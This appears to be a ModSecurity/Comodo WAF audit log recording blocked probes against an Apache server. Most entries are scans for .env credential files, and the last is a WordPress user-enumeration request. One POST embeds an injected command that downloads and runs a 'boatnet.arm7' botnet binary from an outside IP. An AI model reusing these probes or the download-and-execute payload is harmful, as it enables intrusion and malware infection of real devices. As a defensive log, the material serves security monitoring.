X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --62035f44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62035f44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043511801775 669 (- - -) Stopwatch2: 1750043511801775 669; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62035f44-Z-- --d73fea35-A-- [16/Jun/2025:10:11:52 +0700] aE-LeNPYN2mzu-AuhSOpFwAAABQ 103.236.140.4 53054 103.236.140.4 8181 --d73fea35-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d73fea35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d73fea35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512039005 674 (- - -) Stopwatch2: 1750043512039005 674; combined=259, p1=227, p2=0, p3=0, p4=0, p5=31, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d73fea35-Z-- --7d6ffc40-A-- [16/Jun/2025:10:11:52 +0700] aE-LeGf-_Obc6SnO-jx3zQAAAIo 103.236.140.4 53056 103.236.140.4 8181 --7d6ffc40-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7d6ffc40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d6ffc40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512377910 747 (- - -) Stopwatch2: 1750043512377910 747; combined=318, p1=269, p2=0, p3=0, p4=0, p5=49, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d6ffc40-Z-- --1efa5573-A-- [16/Jun/2025:10:11:52 +0700] aE-LeNPYN2mzu-AuhSOpGAAAAAg 103.236.140.4 53058 103.236.140.4 8181 --1efa5573-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --1efa5573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1efa5573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512615458 641 (- - -) Stopwatch2: 1750043512615458 641; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1efa5573-Z-- --c66b633d-A-- [16/Jun/2025:10:11:52 +0700] aE-LeNPYN2mzu-AuhSOpGQAAABY 103.236.140.4 53060 103.236.140.4 8181 --c66b633d-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --c66b633d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c66b633d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512954195 716 (- - -) Stopwatch2: 1750043512954195 716; combined=324, p1=292, p2=0, p3=0, p4=0, p5=32, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c66b633d-Z-- --7285d11b-A-- [16/Jun/2025:10:11:53 +0700] aE-LedPYN2mzu-AuhSOpGgAAAAU 103.236.140.4 53062 103.236.140.4 8181 --7285d11b-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7285d11b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7285d11b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043513191591 623 (- - -) Stopwatch2: 1750043513191591 623; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7285d11b-Z-- --e3198d66-A-- [16/Jun/2025:10:11:53 +0700] aE-LeWf-_Obc6SnO-jx3zgAAAIU 103.236.140.4 53064 103.236.140.4 8181 --e3198d66-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --e3198d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3198d66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043513530403 638 (- - -) Stopwatch2: 1750043513530403 638; combined=248, p1=216, p2=0, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3198d66-Z-- --dcc2ef29-A-- [16/Jun/2025:10:11:53 +0700] aE-LedPYN2mzu-AuhSOpGwAAABE 103.236.140.4 53066 103.236.140.4 8181 --dcc2ef29-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --dcc2ef29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc2ef29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043513767870 636 (- - -) Stopwatch2: 1750043513767870 636; combined=244, p1=218, p2=0, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc2ef29-Z-- --65ee3873-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHAAAAAI 103.236.140.4 53068 103.236.140.4 8181 --65ee3873-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --65ee3873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65ee3873-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514106285 660 (- - -) Stopwatch2: 1750043514106285 660; combined=257, p1=227, p2=0, p3=0, p4=0, p5=29, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65ee3873-Z-- --88892f00-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHQAAAAw 103.236.140.4 53070 103.236.140.4 8181 --88892f00-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --88892f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88892f00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514343663 723 (- - -) Stopwatch2: 1750043514343663 723; combined=305, p1=270, p2=0, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88892f00-Z-- --7077f916-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHgAAAAs 103.236.140.4 53072 103.236.140.4 8181 --7077f916-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7077f916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7077f916-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514682532 632 (- - -) Stopwatch2: 1750043514682532 632; combined=257, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7077f916-Z-- --d2e24714-A-- [16/Jun/2025:10:11:54 +0700] aE-LetPYN2mzu-AuhSOpHwAAABI 103.236.140.4 53074 103.236.140.4 8181 --d2e24714-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d2e24714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2e24714-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043514919763 771 (- - -) Stopwatch2: 1750043514919763 771; combined=372, p1=320, p2=0, p3=0, p4=0, p5=52, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2e24714-Z-- --9f4dec63-A-- [16/Jun/2025:10:11:55 +0700] aE-Le9PYN2mzu-AuhSOpIAAAAAE 103.236.140.4 53076 103.236.140.4 8181 --9f4dec63-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --9f4dec63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f4dec63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043515258583 650 (- - -) Stopwatch2: 1750043515258583 650; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f4dec63-Z-- --b677d841-A-- [16/Jun/2025:10:11:55 +0700] aE-Le9PYN2mzu-AuhSOpIQAAABM 103.236.140.4 53078 103.236.140.4 8181 --b677d841-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b677d841-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b677d841-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043515495855 667 (- - -) Stopwatch2: 1750043515495855 667; combined=271, p1=225, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b677d841-Z-- --dc663658-A-- [16/Jun/2025:10:11:55 +0700] aE-Le9PYN2mzu-AuhSOpIgAAAAQ 103.236.140.4 53080 103.236.140.4 8181 --dc663658-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --dc663658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc663658-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043515834341 743 (- - -) Stopwatch2: 1750043515834341 743; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc663658-Z-- --ea466d24-A-- [16/Jun/2025:10:11:56 +0700] aE-LfB9AUmrZE8TgO0WEfwAAAFc 103.236.140.4 53082 103.236.140.4 8181 --ea466d24-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --ea466d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea466d24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043516071894 670 (- - -) Stopwatch2: 1750043516071894 670; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea466d24-Z-- --9ca23069-A-- [16/Jun/2025:10:43:14 +0700] aE-S0h9AUmrZE8TgO0WEgQAAAEw 103.236.140.4 53180 103.236.140.4 8181 --9ca23069-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 144.172.116.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.116.95 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 --9ca23069-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ca23069-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750045394013643 862 (- - -) Stopwatch2: 1750045394013643 862; combined=380, p1=343, p2=0, p3=0, p4=0, p5=37, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ca23069-Z-- --ae711468-A-- [16/Jun/2025:11:07:28 +0700] aE-YgNPYN2mzu-AuhSOphAAAABA 103.236.140.4 53826 103.236.140.4 8181 --ae711468-B-- GET ///wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 209.182.195.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.182.195.110 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 --ae711468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: 